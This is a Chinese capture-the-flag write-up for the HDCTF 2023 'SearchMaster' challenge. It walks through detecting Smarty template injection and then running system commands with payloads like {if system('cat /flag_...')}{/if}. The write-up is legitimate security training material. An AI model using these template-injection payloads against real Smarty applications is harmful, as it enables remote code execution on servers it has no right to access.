[HDCTF 2023]SearchMaster

[HDCTF 2023]SearchMaster wp

信息搜集

题目页面:

这里提到了模板,猜测是模板注入,提示 POST 发包,参数名为 data 。

测试 POST 传参 data=1 :

有返回。

模板注入

检查模板类型

这里用橙子科技的一张图,红色箭头代表失败后执行的下一步,绿色箭头代表成功后执行的下一步。

首先传入 ${7*7} ,若返回 49 ,则执行成功:

执行成功。

那么接下来传入 a{*123*}b ,若 {**} 内的内容被当成注释,仅返回 ab ,则执行成功:

执行成功,判定为 Smarty 模板。

Smarty 模板注入

Smarty 是 PHP 的一个模板。

推荐博客:Smarty模板注入&CVE-2017-1000480

查看版本号:

{$smarty.version}

返回结果,版本 4.1.0 :

直接上 payload ,个人认为最好用的是 if 语句,if 代码块内可以执行任意 PHP 命令,不要加分号:

{if system('ls /')}{/if}

返回结果:

查看 flag 文件:

{if system('cat /flag_13_searchmaster')}{/if}

这条命令用 burp 发包成功了,用 hackerbar 发包却报错,有大佬知道原因吗?

用 hackerbar 发包:

用 burp 发包:

拿到 flag 。

相关推荐
vortex511 分钟前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
.Ayang40 分钟前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
Hacker_Oldv1 小时前
开放性实验——网络安全渗透测试
安全·web安全
星竹1 小时前
upload-labs-master第12关详细教程
网络安全
饮长安千年月2 小时前
浅谈就如何解出Reverse-迷宫题之老鼠走迷宫的一些思考
python·网络安全·逆向·ctf
东方隐侠安全团队-千里2 小时前
网安瞭望台第3期:俄黑客 TAG - 110组织与密码攻击手段分享
网络·chrome·web安全·网络安全
速盾cdn3 小时前
速盾:CDN缓存的工作原理是什么?
网络·安全·web安全
亚信安全官方账号4 小时前
亚信安全发布《2024年第三季度网络安全威胁报告》
网络安全
网络安全-杰克4 小时前
网络安全概论
网络·web安全·php